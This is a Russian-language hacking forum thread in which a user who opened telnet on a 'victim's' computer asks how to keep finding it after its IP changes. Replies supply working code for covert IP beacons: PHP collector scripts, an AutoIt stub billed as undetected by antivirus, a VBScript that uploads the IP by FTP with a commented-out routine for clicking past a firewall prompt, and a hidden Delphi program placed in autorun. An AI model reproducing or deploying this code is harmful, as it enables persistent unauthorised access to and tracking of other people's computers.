Ситуация: Открыл телнет у компа жертвы. Первый раз зашел на комп, все окей. Но после того как жертва перезагружает тачку меняется IP. Как теперь попасть на комп? Панимаю можно паслать через сетевой снифер. Но постоянно кидать ее на снифер не вариант. Я так думаю... Как разобраться с такой проблемой? Те как всегда знать ее IP?

Те как всегда знать ее IP?
Постоянно коннектится к ней

Вбить в крон инет-качалку со ссылкой на снифер, который запишет айпи в лог. Либо написать маленькую прогу, которая будет делать тоже самое.

Те как всегда знать ее IP?
Постоянно коннектится к ней
Перечитай мой пост...

Вбить в крон инет-качалку со ссылкой на снифер, который запишет айпи в лог. Либо написать маленькую прогу, которая будет делать тоже самое.
А можно поподробнее и если незатруднит пример...

троя ему залей, и пусть он те логи шлет когда скажешь.
или подключи ему dyndns ))и ему приятно и тебе полезно))))

какого троя то?

Кури в сторону hamachi (как только он будет в сети он будет у тя в онлайне )

shell_c0de, ему нужно IP адрес знать.
Напиши программку которая при наличии подключения к интернету будет каким - либо образом отправлять тебе айпишник(аська, мыло, гейт) и добавь ее в автозагрузку.

блин..... нарыл програмулинку, вроде пахала и ее непалил антивирус.... сегодня начал соберарать все во едино и антивирус палит прогу...
ipbot.exe

Если у тебя есть хост, то:
Заливаешь туда скрипт пыховский:
<?php
file = fopen("log.txt","w");
fwrite(file,$_SERVER['REMOTE_ADDR']);
fclose(file);
?>
На вражеском компе в авторан мини скрипт, запрашивающий эту страничку
Смотрим log.txt и там ву-а-ля: IP жертвы :)

Если у тебя есть хост, то:
Заливаешь туда скрипт пыховский:
<?php
file = fopen("log.txt","w");
fwrite(file,$_SERVER['REMOTE_ADDR']);
fclose(file);
?>
На вражеском компе в авторан мини скрипт, запрашивающий эту страничку
Смотрим log.txt и там ву-а-ля: IP жертвы :)

"мини скрипт" можно поподробней... И желательно так чтоб каждый час например запрашивал

Лучше всего конечно ASM + Winsock, но можно вполне и на делфи написать. В общем пишешь через indy (компонент IdHTTP) программу, которая будет посылать GET запрос на указанный хост, который в свою очередь содержит скрипт, записывающий в логи айпи. Ну и сделай это все в таймере. Интервал поставь какой надо. И пропиши программу в автозагрузку. Вот собственно и весь метод.

AutoIt код:
#include <HTTP.au3>
$host = "www.php.jim"
$page = "/some.php"
$http = _HTTPConnect($host)
_HTTPGet($host,$page,$http)

HTTP.au3 (http://www.autoitscript.com/forum/index.php?showtopic=29631)

Компилиш и вот тебе беспалевный ехешник,как в авторан запихать расказывать не буду, думаю тебе мои способы покажутся палевными :) (я ядро винды не лапаю Oo)

vb script если нужно под себя подделаешь ;)
On Error Resume Next
newfolderpath = "C:\WEB" 'Папка где находится скрипт
login="фтп-логин"
password="фтп-пасс"
ftpp="ftp.narod.ru"
'================================================= ===
' Узнаем текущий IP и пишем его в файл
'================================================= ===
set objLocator = WScript.CreateObject("WbemScripting.SWbemLocator")
set objService = objLocator.ConnectServer (server, "", username, password)
strQuery = "Select IPAddress from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE"
set objEnumerator = objService.ExecQuery(strQuery)
for each obj in objEnumerator
if Not IsNull(obj.IPAddress) then
for i=LBound(obj.IPAddress) to UBound(obj.IPAddress)
GetIPaddress = obj.IPAddress(i)
'Узнаем текущий (реальный) наш IP
Str = GetIPaddress
next
end if
next
FileDestination = "ip.txt"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Destination = FSO.CreateTextFile(FileDestination)
Destination.WriteLine Str
set Destination = Nothing
Set FSO = Nothing
set objLocator = Nothing
'================================================= ================================================== ============
'Отправляем на фтп текущий IP
'Отсылаем на ФТП на narod.ru
'Создаем файл сценария для FTP.EXE
set FSO = CreateObject("Scripting.FileSystemObject")
Set WSHshell = WScript.CreateObject("WScript.Shell")
Set sDir = WSHshell.Environment("Process") ' - находим путь к папке Windows
Set cScript = fso.CreateTextFile (sDir("windir") & "\FTp.scr") '-Обозначаем место, где будет создан и сохранен файл сценария (в данном случае - папочка виндовз)
cScript.WriteLine "Open " & ftpp & "" '- Открываем соединение с сайтом ftp.narod.ru на 21 порту
cScript.WriteLine "" & login & "" '- Имя пользователя
cScript.WriteLine "" & password & "" '- Пароль
cScript.WriteLine "drive C:" '- Выбраем диск С
cScript.WriteLine "lcd " & newfolderpath ' - Устанавливаем папку, откуда будем отсылать данные
cScript.WriteLine "prompt" ' - Отключаем всякий диалог по каждому файлу
cScript.WriteLine "binary" ' - метод передачи файлов по FTP
cScript.WriteLine "PUT ip.txt"'- Отправляем IP
cScript.WriteLine "bye" '-разрываем соединение с ftp.narod.ru
cScript.Close '- Конец записи в файл сценария
' Запускаем FTP-сценарий
WSHshell.Run sDir("windir") & "\system32" & "\FTP.ExE -s:" & sDir("windir") & "\FTp.scr", 0
' Обходим фаер (в данном случае Outpost, если надо, раскоментируйте с помощью символа " ' " все строчки, что ниже, до '---------------------------)
'set w=CreateObject("WScript.Shell")
'a=0
'do
'r=W.AppActivate("ftp.exe")
'if r then
'a=1
'w.SendKeys "{tab 2}"
'w.SendKeys "{enter}"
'end if
'loop until a=1
'set w=Nothing
'---------------------------
Set fso = Nothing
Set WSHshell = Nothing
'================================================= ===
'А теперь запускаем цикл проверки на изменение IP
'================================================= ===
Const ForReading = 1
Str=1
s=2
if Str<>s then
While 1
WScript.Sleep 10000 ' Сканим на изменение IP раз в 15 минут
set objLocator = WScript.CreateObject("WbemScripting.SWbemLocator")
set objService = objLocator.ConnectServer (server, "", username, password)
strQuery = "Select IPAddress from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE"
set objEnumerator = objService.ExecQuery(strQuery)
for each obj in objEnumerator
if Not IsNull(obj.IPAddress) then
for i=LBound(obj.IPAddress) to UBound(obj.IPAddress)
GetIPaddress = obj.IPAddress(i)
'Узнаем текущий (реальный) наш IP
Str = GetIPaddress
next
end if
next
Set FSO = Nothing
set objLocator = Nothing
Set FSO = CreateObject("Scripting.FileSystemObject")
Set ts = FSO.OpenTextFile("ip.txt", ForReading)
s = ts.ReadLine
ts.Close
Set FSO = Nothing
Set ts = Nothing
if Str<>s then
FileDestination = "ip.txt"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Destination = FSO.CreateTextFile(FileDestination)
Destination.WriteLine Str
set Destination = Nothing
Set FSO = Nothing
'================================================= ================================================== ============
'Отправляем на фтп новый IP (уже в цикле, каждые 15 минут, в случае, если IP изменился)
'Отсылаем на ФТП на narod.ru
'Создаем файл сценария для FTP.EXE
set FSO = CreateObject("Scripting.FileSystemObject")
Set WSHshell = WScript.CreateObject("WScript.Shell")
Set sDir = WSHshell.Environment("Process") ' - находим путь к папке Windows
Set cScript = fso.CreateTextFile (sDir("windir") & "\FTp.scr") '-Обозначаем место, где будет создан и сохранен файл сценария (в данном случае - папочка виндовз)
cScript.WriteLine "Open " & ftpp & "" '- Открываем соединение с сайтом ftp.narod.ru на 21 порту
cScript.WriteLine "" & login & "" '- Имя пользователя
cScript.WriteLine "" & password & "" '- Пароль
cScript.WriteLine "drive C:" '- Выбраем диск С
cScript.WriteLine "lcd " & newfolderpath ' - Устанавливаем папку, откуда будем отсылать данные
cScript.WriteLine "prompt" ' - Отключаем всякий диалог по каждому файлу
cScript.WriteLine "binary" ' - метод передачи файлов по FTP
cScript.WriteLine "PUT ip.txt"'- Отправляем куки от IE
cScript.WriteLine "bye" '-разрываем соединение с ftp.narod.ru
cScript.Close '- Конец записи в файл сценария
' Запускаем FTP-сценарий
WSHshell.Run sDir("windir") & "\system32" & "\FTP.ExE -s:" & sDir("windir") & "\FTp.scr", 0
' Обходим фаер (в данном случае Outpost, если надо, раскоментируйте с помощью символа " ' " все строчки, что ниже, до '---------------------------)
'set w=CreateObject("WScript.Shell")
'a=0
'do
'r=W.AppActivate("ftp.exe")
'if r then
'a=1
'w.SendKeys "{tab 2}"
'w.SendKeys "{enter}"
'end if
'loop until a=1
'set w=Nothing
'---------------------------
Set fso = Nothing
Set WSHshell = Nothing
end if
Wend
end if
этот скрипт меня не раз выручал ;) Ну в общем дерзай :)

Не работает у меня приходит левый IP

Не работает у меня приходит левый IP
Ты хотябы со скриптом разобрался ? Как видишь этот скрипт выполняет следующие ф-ции:
1. распознает ВНУТРЕСЕТЕВОЙ ip
2. сохраняет его в txt
3. отправляет его тебе на ftp
...
Ну в общем не чего сложного!
Тебе нужен внутресетевой или внешний ip?

Хм... да ты прав А как его переделать под внешний ip?

Вот код на делфи. Передает айпи на скрипт ip.php, который принимает его и записывает в файл ip.txt. Кидаем на форму три компонента - таймер, IdHTTP (Indy Clients) и IdIpWatch (Indy Misc).

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, IdIPWatch, IdBaseComponent, IdComponent, IdTCPConnection,
IdTCPClient, IdHTTP, ExtCtrls;

type
TForm1 = class(TForm)
Timer1: TTimer;
IdHTTP1: TIdHTTP;
IdIPWatch1: TIdIPWatch;
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;
myip: string;

implementation

{$R *.dfm}

procedure TForm1.Timer1Timer(Sender: TObject);
begin
myip:=IdIpWatch1.LocalIP;
IdHTTP1.Get('http://mysite.ru/ip.php?ip=' + myip); //Меняем на свой адрес хоста, где размещен скрипт.
end;

end.

Выставляем интервал таймера. Он отвечает за скорость передачи на скрипт айпи. 1000 = 1 сек.

Затем клацаем Project - View Source, и там дописываем одну строчку - Application.ShowMainForm:=False;

Должно получиться вот так:

program Project1;

uses
Forms,
Unit1 in 'Unit1.pas' {Form1};

{$R *.res}

begin
Application.Initialize;
Application.CreateForm(TForm1, Form1);
Application.ShowMainForm:=False;
Application.Run;
end.


Это сделает твою программу скрытой.

Вот php скрипт, который принимает IP:

<?php
$file = fopen("ip.txt","a");
fwrite($file, $_GET['ip']);
fwrite($file, "\r\n");
fclose($file);
?>

Все айпи будут записанные в ip.txt

Nik(rus), а иконка AutoIt в трее совсем не палевная, да? :)

Не работает у меня приходит левый IP
Обычно все хацкеры стараются получить внутренний ip ;) Зачем тебе внешний?

Внутренний? Кто тебе такое сказал? Зачем тебе внутресетевой айпи? о_О Он нужен только в том случае, если ты подключен к той локальной сети, к которой принадлежит твоя жертва. Тогда можно его использовать для подключения к серверной части backdoor'a. А если подключаться через и-нет, то нужен именно внешний IP.

короче не парься)
вот http://forum.antichat.ru/threadnav84364-1-10.html
не забудь + поставить)

Sams: ну иконка это не трабл)
В начале добавляешь #NoTrayIcon
(а про беспалевность я имел ввиду антивири)

Вот код на делфи. Передает айпи на скрипт ip.php, который принимает его и записывает в файл ip.txt. Кидаем на форму три компонента - таймер, IdHTTP (Indy Clients) и IdIpWatch (Indy Misc).



Выставляем интервал таймера. Он отвечает за скорость передачи на скрипт айпи. 1000 = 1 сек.

Затем клацаем Project - View Source, и там дописываем одну строчку - Application.ShowMainForm:=False;

Должно получиться вот так:



Это сделает твою программу скрытой.

Вот php скрипт, который принимает IP:

<?php
$file = fopen("ip.txt","w");
fwrite($file, $_GET['ip']);
fwrite($file, \r\n);
fclose($file);
?>

Все айпи будут записанные в ip.txt

ERROR (http://123.futuredc.net/mdes.gif)

Твой скрин с ошибкой не грузиться. Перезалей, если можешь.
Извиняюсь, допустил там маленькую ошибку - не поставил кавычки.

P.S. И еще подправил режим открытия файла с "w" на "a".

<?php
$file = fopen("ip.txt","a");
fwrite($file, $_GET['ip']);
fwrite($file, "\r\n");
fclose($file);
?>

не читал все сообщения этой темы, поэтому могу повториться.
есть такая штука как ddclient, эта прога связываеться через определенный период с сервером и шлет ей ip, а он в свою очередь присваивает доменное имя. в таком случае обращаться к компу жертвы будешь указывая, в параметрах telnet-клиента то доменное имя, которое присвоил ей при регистрации на dyndns.com (офф.сайт), а не айпи.
на винду ее не ставил, но на линуксе она ставиться как два пальца обо...
обычно эта тему используют админы чтобы поднять какой-то элементарный сервер на машине с динамическим ip, в твоем случае это то что надо, и кодить не надо.

P.S.если ты с жертвой в одной подсети и выходить в инет через один и тотже шлюз, то такая тема не прокатит

есть еще inadyn

Твой скрин с ошибкой не грузиться. Перезалей, если можешь.
Извиняюсь, допустил там маленькую ошибку - не поставил кавычки.

P.S. И еще подправил режим открытия файла с "w" на "a".

<?php
$file = fopen("ip.txt","a");
fwrite($file, $_GET['ip']);
fwrite($file, "\r\n");
fclose($file);
?>
http://i014.radikal.ru/0911/6b/69850efaa91ft.jpg (http://radikal.ru/F/i014.radikal.ru/0911/6b/69850efaa91f.jpg.html)

Эм...а на VB примеры есть ? Или там геморно.

Эм...а на VB примеры есть ? Или там геморно.


Dim objHTTP As Object
Set objHTTP = CreateObject("Microsoft.XMLHTTP")
Call objHTTP.Open("GET", "http://www.ya.ru/", False)
Call objHTTP.Send

Просили у мну такую прогу, если нужна стучи в асю, будет отсылать все ипы машины на твоё мыло.

Если у тебя есть хост, то:
Заливаешь туда скрипт пыховский:
<?php
file = fopen("log.txt","w");
fwrite(file,$_SERVER['REMOTE_ADDR']);
fclose(file);
?>
На вражеском компе в авторан мини скрипт, запрашивающий эту страничку
Смотрим log.txt и там ву-а-ля: IP жертвы :)


а есть такой мини скрипт на VB полностью?

динднс можно установить в невидимом режиме (убрать с трея)

Могу написать програмку пиши в icq : 444-8шесть8-181

Открываешь какой-то не стандартный порт, а потом сканишь на этот порт диапазон айпи.